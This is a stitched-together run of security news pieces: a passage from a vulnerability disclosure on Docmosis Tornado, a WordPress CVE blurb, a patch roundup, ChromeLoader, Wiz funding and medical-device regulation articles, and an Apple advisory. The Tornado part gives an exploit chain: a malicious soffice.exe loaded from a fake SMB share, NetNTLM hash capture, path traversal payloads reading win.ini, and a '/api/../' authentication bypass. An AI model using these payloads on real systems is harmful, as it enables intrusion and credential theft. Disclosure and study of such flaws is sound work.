*   We create a “malicious” soffice.exe file with a C cross compiler with the following code underneath.

    void main()
    {
    	system("cmd.exe /C calc");
    }
    

*   We mimick the directory/file structure of a valid LibreOffice installation on our remote attacker server.
    
*   We provide a fake SMB server with help of the impacket suite.
    
*   We change the Office location in the web UI pointing to this server \\10.137.0.16\myshare\LibreOffice.
    

*   We observe NTLM authentication on our fake SMB server.

*   We trigger the restart of the Tornado service and got code execution, i.e. our malicious soffice.exe got executed, popping a Windows calculator.

Since the targeted server uses NTLM authentication to login to the attacker’s fake SMB server, this could of course be used to capture the **NetNTLM hash**. This hash could be cracked offline, so finally an attacker would have had valid Windows credentials to access the server via other channels.

**Multiple Path Traversals - File Read**

In general, no proper validation of file system operations with respect to traversal attacks can be found. This allows various attack vectors leading to file disclosure out of the context directories specified within the Tornado application.

**Restricted File Read**

First, we show a file read primitive with a few restrictions for the attacker. The **“Source Templates From”** directory is set to C:\Users\user\Desktop\templates in our lab environment.

Using the function _“Creating dummy data based on template”_ in the web UI fills the _Data_ text field automatically so afterwards we can click the _Test_ button to create e.g. a PDF file. Next to our templates directory, mentioned above, we put a file with fake secret data C:\Users\user\Desktop\secretfolder\secret.txt. Now the request is intercepted and a path traversal payload injected into the template reference path.

Indeed, the generated document contains the content of the secret file: a file located at a completely different folder than C:\Users\user\Desktop\templates.

This seems at least be restricted to certain file types but nevertheless is a juicy vulnerability.

**Full File Read**

The most dangerous path traversal vulnerability originates from the service call to /fetch?filename=[SOME_NAME].pdf. This is called after we generated the PDF file above to automatically download the file content from the server.

The corresponding implementation can be found in com.docmosis.webserver.servlet.FetchTmp.doGet(HttpServletRequest, HttpServletResponse). The filename request parameter is used within a String concatenation to retrieve the file.

    filename = request.getParameter("filename");
    filename = System.getProperty("java.io.tmpdir") + "/" + filename;
    

This allows an attacker to again introduce relative path segments, giving access to arbitrary files on the server file system. Here, we show reading the file C:\Windows\win.ini.

**Authentication Bypass**

Even though, the default installation does not require an _Admin password_ being set, the web UI indeed provides a configuration field. To test this, we set a password, clicked the logout button and indeed are redirected to the login page.

Also our full file read vulnerability now cannot be exploited anymore from an unauthenticated content (_still exploitable as authenticated user, though_).

Looking at the web descriptor file web.xml reveals that an authentication filter is set in place for all URI paths.

    <filter-mapping>
    	<filter-name>AuthenticatedCheckFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping> 
    

Every request has to go through the Java Servlet filter com.docmosis.webserver.servlet.AuthenticatedCheckServlet.doFilter(ServletRequest, ServletResponse, FilterChain). Surprisingly, the authentication check can be bypassed to reach the final chain.doFilter(request, response) call. Responsible for this is the following code path:

    if (!authenticated) // [1]
    {
      if (!isRestCall) { // [2]
    
    
    
        
        WebServerPreferences prefs = WebServerPreferencesStore.getPrefs();
        boolean authenticationRequired = !StringUtilities.isEmpty(prefs.getAdminPassword());
        
        if (authenticationRequired) { // [3]
          
          if (isGWTRPCCall) {
            
            ((HttpServletResponse)response).sendError(401); return;
          } 
          if (!this.authPostUrl.equals(req.getRequestURI())) {
            
            RequestDispatcher rd = req.getRequestDispatcher("/authenticate.jsp");
            rd.forward(request, response);
    
            
            return;
          } 
        }
    } 
    

At \[1\], it is properly checked if the user is already authenticated. If not, the if branch is entered. If this request is not part of a REST call \[2\] and an Admin password is set \[3\], then access is denied. The problem now relies in the check if isRestCall is true/false.

    boolean isRestCall = req.getRequestURI().startsWith("/api/")
    

Our path traversal attack e.g. /fetch?filename=../../../../../Windows/win.ini indeed does not start with /api but at this point of HTTP request processing, a simple bypass is possible due to using the startsWith String method. Using an URI path with relative path segments like /api/../fetch?filename=../../../../../Windows/win.ini bypasses the authentication check and triggers the file read primitive again.

**Internet Exposure Check**

These findings were shared with the vendor and they released **version 2.9.5** to address these issues (I did not validate the patches, though). Checking the exposure rate of this software on the public Internet, one of the systems found was **\[REDACTED\].upu.int**. Even though, this instance was not using the latest version, the same vulnerabilities still worked fine.

As it turned out, this system belongs to the **Universal Postal Union (UPU)**, a specialized agency of the United Nations (UN). Additionally, this system seemed to be part of the official UPU network, i.e. no cloud-hosted instance but rather an entry point to the network of UPU.

The system exposed a web UI of Docmosis Tornado with default configurations, i.e. no authentication needed at all. Even if authentication would have been needed, we already found an **Authentication Bypass**.

To prove the system to be vulnerable, we read the content of C:\Windows\win.ini and provided the report as quickly as possible.

**Acknowledgements**

Many thanks to Carlos from UNICC to forward my requests to UPU quickly. Also the Docmosis team communicated fast and professionally.

P.S.: I’m pretty sure there’re more vulnerabilities in this product. Go, practice and responsibly disclose issues to the Docmosis team. Maybe you’ll find a deserialization vulnerability somewhere _\*hint\*_.

CVE-2023-25266: Using 0days to Protect the United Nations

The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-1028: Diff [2869205:2870465] for wp-meta-seo/trunk – WordPress Plugin Repository

Plus: Microsoft fixes several zero-day bugs, Google patches Chrome and Android, Mozilla rids Firefox of a full-screen vulnerability, and more.

February has been a big month for security updates, with the likes of Apple, Microsoft, and Google releasing patches to fix serious vulnerabilities. Meanwhile, a number of enterprise bugs have been squashed by firms that include VMware, SAP, and Citrix. 

The flaws fixed during the month include several that were being used in real-life attacks, so it’s worth checking that your software is up to date.

Here’s everything you need to know about the security updates released this month. 

Apple iOS and iPadOS 16.3.1

Just weeks after the release of iOS 16.3, Apple issued iOS and iPadOS 16.3.1—an emergency patch to fix vulnerabilities that included a flaw in the browser engine WebKit that was already being used in attacks.

Tracked as CVE-2023-23529, the already exploited bug could lead to arbitrary code execution, Apple warned on its support page. “Apple is aware of a report that this issue may have been actively exploited,” the firm added. Another flaw patched in iOS 16.3.1 is in the Kernel at the heart of the iPhone operating system. The bug, which is tracked as CVE-2023-23514, could allow an attacker to execute arbitrary code with Kernel privileges.

Later in the month, Apple documented another vulnerability fixed in iOS 16.3.1, CVE-2023-23524. Reported by David Benjamin, a software engineer at Google, the flaw could enable a denial of service attack via a maliciously crafted certificate.

Apple also released macOS Ventura 13.2.1, tvOS 16.3.2, and watchOS 9.3.1 during the month.

Microsoft 

In mid-February, Microsoft warned that its Patch Tuesday has fixed 76 security vulnerabilities, three of which are already being used in attacks. Seven of the flaws are marked as critical, according to Microsoft’s update guide.

Tracked as CVE-2023-21823, one of the most serious of the already exploited bugs in the Windows graphics component could allow an attacker to gain System privileges.

Another already exploited flaw, CVE-2023-21715, is a feature bypass issue in Microsoft Publisher, while CVE-2023-23376 is a privilege escalation vulnerability in Windows common log file system driver.

That’s a lot of zero-day flaws fixed in one release, so take it as a prompt to update your Microsoft-based systems as soon as possible.

Google Android 

Android’s February security update is here, fixing multiple vulnerabilities in devices running the tech giant’s smartphone software. The most severe of these issues is a security vulnerability in the Framework component that could lead to local escalation of privilege with no additional privileges needed, Google noted in an advisory. 

Among the issues fixed in the Framework, eight are rated as having a high impact. Meanwhile, Google has squashed six bugs in the Kernel, as well as flaws in the System, MediaTek, and Unisoc components.

During the month, Google patched multiple privilege escalation flaws, as well as information disclosure and denial of service vulnerabilities. The company also released a patch for three Pixel-specific security issues. The Android February patch is already available for Google’s Pixel devices, while Samsung has moved quickly to issue the update to users of its Galaxy Note 20 series.

Google Chrome 

Google has released Chrome 110 for its browser, fixing 15 security vulnerabilities, three of which are rated as having a high impact. Tracked as CVE-2023-0696, the first of these is a type confusion bug in the V8 JavaScript engine, Google wrote in a security advisory. 

Meanwhile, CVE-2023-0697 is a flaw that allows inappropriate implementation in full-screen mode, and CVE-2023-0698 is an out-of-bounds read flaw in WebRTC. Four medium-severity vulnerabilities include a use after free in GPU, a heap buffer overflow flaw in WebUI, and a type confusion vulnerability in Data Transfer. Two further flaws are rated as having a low impact.

Apple Users Need to Update iOS Now to Patch Serious Flaws

By Deeba Ahmed
What's worse, in the new campaign, ChromeLoader malware evades detection by security software.
This is a post from HackRead.com Read the original post: Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Beware of fake ROBLOX, Steam and Nintendo game cracks that may contain the ChromeLoader malware. Learn more about the threat and how to protect your device from this malicious software.

The cybersecurity researchers at AhnLab Security Emergency response Center (ASEC) have discovered a new ChromeLoader malware campaign in which hackers managed to bypass antivirus programs and other cybersecurity mechanisms. This campaign is dubbed uncommon due to the file type attackers have used to evade detection.

**Hackers Using VHD Files As Popular Games Cracks**

According to AhnLab researchers, the ChromeLoader malware campaign is distributed via VHD (virtual hard disk) files, which is a different choice because, usually, ISO optical disc image format files are used in such campaigns.

However, in this case, attackers have used VHD files, which are distributed with filenames that seem like cracks or hacks for Steam and Nintendo games. The objective is to modify browser settings by infecting web browsers, such as Google Chrome, and diverting traffic to bogus advertising websites. A VHD file can be easily mounted on a Windows device and works with most virtualization software as well.

One of the malicious websites (Screenshot credit: ACSE)

“When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post.

**What is ChromeLoader?**

ChromeLoader, also known as ChromeBack and Choziosi, surfaced first as a browser-hijacking credential stealer in January 2022. In May 2022, ChromeLoader malware was pushed into pirated games and QR codes.

Eventually, it evolved into a multi-faceted, potent threat capable of stealing sensitive user data, deploying ransomware, and dropping decompression bombs.

ChromeLoader can also conduct click fraud by leveraging browser extensions to monetize clicks. Many of its new versions can invade both macOS and Windows devices. The shift from ISO to VHD files indicates that ChromeLoader has undergone another round of upgrades.

**Numerous Websites Promoting Fake Game Cracks/Hacks**

Researchers noticed that several malicious websites were marketing cracked versions of famous games, including the following:

*   ROBLOX
*   Elden Ring
*   Dark Souls 3
*   Need for Speed
*   Mario Kart 8 Deluxe
*   Super Mario Odyssey
*   Call of Duty and more
*   Red Dead Redemption 2
*   The Legend of Zelda: Breath of the Wild

Additionally, software versions such as Adobe Photoshop and Microsoft Office are also marketed in this campaign.

Although the malicious websites hosting fraudulent game hacks and software versions have been taken offline, gamers and unsuspecting users should beware of this campaign.

Instead of downloading the game, they may receive ChromeLoader malware that can launch unwanted ads on their devices and steal credentials from web browsers and other saved data.

Users looking for pirated video game hacks and software are the key targets of attackers, who are lured into downloading VHD files from compromised websites appearing in search results.

1.  Malicious pirated games disable Windows Defender
2.  This malware hides in VPN, pirated security software
3.  Pirated software drop cryptomining malware on Macbook
4.  Pirated Version of Fire and Fury Book Loaded with Malware
5.  Inmates pirated movies from computers built with spare parts

Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Cloud security vendor Wiz has raised $900 million since its founding in 2020.

Cloud security vendor Wiz has reached $10 billion valuation in the wake of a $300 million Series D round. Wiz plans to use the latest investment for product development and to increase the size of its workforce.

Security teams can use Wiz's cloud security platform to analyze infrastructure hosted in public cloud services such as Amazon Web Services, Azure, and Google Cloud, as well as to monitor infrastructure-as-code, APIs, and containers for vulnerabilities and misconfigurations. The platform consolidates a range of capabilities, including cloud security posture management, external attack surface management, cloud detection and response, and cloud-native application protection. At the heart of Wiz’s offering is the "security graph," which triages and correlates attack paths so that developer and security teams have information about the cause of a breach and how to respond.

The company's rise has been stratospheric, launching in March 2020 and hitting unicorn status a year later with a valuation of $1.7 billion. Wiz was valued at $6 billion after raising $250 million in a Series C funding round in October 2021. Wiz has raised $900 million to date.

The excitement around Wiz underscores a red-hot cloud security market that has accelerated as organizations shift more of their workloads to the cloud to accommodate a growing remote workforce and to support digital transformation initiatives. There are several cloud security vendors carving out space in the market, such as Palo Alto Networks and Check Point, and quite a few are chasing venture capital funding, such as Sentra, Gem Security, Dig Security, Laminar, and Ops Security.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Wiz Reaches $10B Valuation With Consolidated Cloud Security Platform

By Waqas
Here’s a rundown of the impact of new cybersecurity regulations as they are applied to the medical device industry. 
This is a post from HackRead.com Read the original post: How New Cybersecurity Regulations Are Shaping the Medical Device Industry

Discover how the latest cybersecurity regulations are influencing the medical device industry. Learn about the measures manufacturers are taking to meet compliance requirements, enhance device security, and protect patient data. Stay ahead of the curve with insights into the evolving landscape of medical device cybersecurity.

Given its direct effect on health and life, the medical industry is subject to stringent regulations. Governments worldwide exercise some form of control over medical products and services.

However, the regulations don’t appear to be as agile as they should be in light of the growing cyber threats on web-connected medical equipment and other digital devices used in healthcare.

Medical devices that connect to the internet and to other gadgets have been in use for quite some time, but it’s only in the past couple of years that regulators have paid attention to the serious threats hounding modern medical hardware. Better late than never as some would say—it’s good to see policymakers stepping up their game to ensure the secure use or operation of medical equipment.

Here’s a rundown of the impact of new cybersecurity regulations as they are applied to the medical device industry. 

The passage of the United States 2023 Omnibus Bill comes with the expansion of the US Food and Drug Administration’s authority over medical device security. This expanded authority gives the FDA the power to set cybersecurity requirements for medical devices and requires all device manufacturers to demonstrate that their products meet these requirements.

This legislation provides the FDA with additional funding and statutory powers that significantly impact the medical device industry. Before the FDA’s updated authority, cybersecurity for medical devices was more of an auxiliary or supplemental concern. It was evaluated separately and not with the same urgency accorded to other device safety concerns.

The FDA’s new powers allow it to compel device manufacturers to implement a product development framework that meets security requirements. Devices will not be made available to customers unless they are secure.

Device makers will be required to monitor and address postmarket cybersecurity vulnerabilities, develop processes to provide reasonable cybersecurity assurance, submit a software bill of materials (SBOM), and comply with other requirements set by the FDA. Security is now part of the safety evaluation of devices.

The 2023 Omnibus Bill defines the devices to be covered by the FDA’s expanded authority as something that meets any of the following conditions: having software/firmware in it, the ability to connect to the internet, and the potential to be affected by cyber threats or attacks. This means that a vast range of devices will be covered and unscrupulous manufacturers will have a hard time circumventing FDA scrutiny.

All these bode well for patient safety, but many device makers will likely regard it as onerous. The changes they need to implement in their product development and monitoring processes mean additional costs. They also mean a slower time to market. 

**CISA’s push for secure-by-design policy: compulsory security throughout the product life cycle**

The Cybersecurity and Infrastructure Security Agency (CISA) of the United States is pushing for the adoption of “secure-by-design” and “secure-by-default” policies among technology manufacturers, which include advanced medical device makers.

The agency attempts to address the fixation of most companies to get their products out to the market as quickly as possible, disregarding crucial safety concerns especially when it comes to cybersecurity. 

CISA also seeks to make organizations develop voluntary performance goals that match the specific needs and environments they are dealing with. These specific performance objectives allow organizations to have a better grasp of the threat landscape and how they can improve their products to stop or mitigate the impact of cyber attacks.

Moreover, CISA plans to encourage enterprises to be security-conscious through a government-sanctioned acknowledgement or praise for compliant organizations. The agency also plans to take advantage of the US IT procurement capacity to reward businesses that embrace the secure-by-design policy with favourable procurement deals.

CISA does not have a lot of regulatory authority, but it is capable of influencing organizations to become security-aware and capable of adapting to the changing needs in the field of medical device security. It plays two major roles: serving as the operational lead for Federal Cybersecurity and working as the national coordinator for critical infrastructure security and resilience. 

**EU Medical Device Regulation: systematized device security**

In 2020, the European Union introduced regulations to address medical device cybersecurity threats. These regulations are collectively known as the Medical Device Regulation (MDR) framework aims to ensure that all medical devices imported into the EU are of high quality and guaranteed safety. 

MDR supplants the EU Medical Device Directive (MDD), which has been in place for nearly a quarter of a century. MDR is a mandatory requirement for all medical devices that enter the EU market. It sets a product classification system, clinical evaluation process, EUDAMED mechanisms, and supply chain guidelines to ensure medical device security and safety.

The European Union is one of the biggest markets for medical devices. MDR has been in effect for more than a year now. Its implementation has shown that it is possible to exercise effective regulation to ensure patient safety and security against cyber assailants. Its new requirements for medical device imports leave no room for run-of-the-mill device makers. It forces everyone to systematically integrate cybersecurity across the product development lifecycle

**Japan’s MHLW guidelines: information sharing with healthcare providers and patients**

Japan has been at the forefront of medical device cybersecurity regulations in Asia. The country’s Ministry of Health, Labour, and Welfare (MHLW) announced in 2020 new guidelines regarding medical device security. These guidelines require medical device manufacturers to implement a cybersecurity management system and conduct regular risk assessments. They also ask manufacturers to provide information on the security of medical devices to healthcare providers and patients.

The MHLW guidelines are notable for their emphasis on information sharing. All relevant parties are informed about the security of medical device products. This is important in establishing trust and encouraging everyone to play a role in making sure that the medical devices available in the market are secure and unlikely to be compromised by threat actors.

**How industries are responding**

It’s safe to say that there have been no objections from the medical tech sector, at least nothing explicit. Some in the tech industry have openly welcomed the new regulations. Google, for one, expressed support for the efforts to raise cybersecurity standards in mobile and IoT gadgets.

New medical device regulations do not only mean improved medical device effectiveness and patient safety. They also promote the development of new solutions to help device makers keep up with the new security requirements efficiently. They create opportunities for innovative companies, especially when it comes to addressing new cybersecurity needs.

Israeli medical software provider MedDev Soft, for example, offers solutions that simplify and accelerate software development and regulatory compliance for medical products. Californian startup Medcrypt offers cryptography, monitoring, and vulnerability management solutions for medical device makers. 

Another Israeli company, Sternum, takes a different approach and offers integrated on-device endpoint security that helps with cyber regulations. The main advantage of this particular solution is that it can be used to easily retrofit existing devices. Sternum is responsible for the security of the pacemakers of Medtronic, for example.

Recent cyber attacks on healthcare organizations have highlighted the importance of cybersecurity regulations for medical devices. Device manufacturers, the tech industry in general, and cybersecurity firms acknowledge the need to bolster defenses in line with the US Cybersecurity and Infrastructure Security Agency’s recent pronouncements on the state of healthcare cybersecurity.

**In conclusion**

Recent cyber attacks on healthcare organizations have highlighted the importance of cybersecurity regulations for medical devices. There may have been no significant incidents of cyber attacks that sought to harm individuals by hacking into their connected medical devices. However, it is better to anticipate the attacks than to be caught flatfooted.

New regulations are shaping the medical device industry, especially when it comes to the safety and security aspects. These regulations greatly benefit patients, but they are also a welcome development for the cybersecurity industry. Security firms have been developing new solutions to help organizations comply more easily while ensuring honest-to-goodness medical device security.

1.  Importance Of Medical Alert Devices
2.  Intel chip flaw left medical devices vulnerable
3.  AI firm exposes sensitive medical records online
4.  Drastic Implication of Unpatchd Medical Devices
5.  Ransomware attack on US healthcare debt collector

How New Cybersecurity Regulations Are Shaping the Medical Device Industry

A denial-of-service issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.2.1, iOS 16.3.1 and iPadOS 16.3.1, tvOS 16.3.2, watchOS 9.3.1. Processing a maliciously crafted certificate may lead to a denial-of-service.

This document describes the security content of watchOS 9.3.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**watchOS 9.3.1**

Released February 13, 2023

**Security**

Available for: Apple Watch Series 4 and later

Impact: Processing a maliciously crafted certificate may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved input validation.

CVE-2023-23524: David Benjamin of Google Chrome

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: February 20, 2023

Tag

#google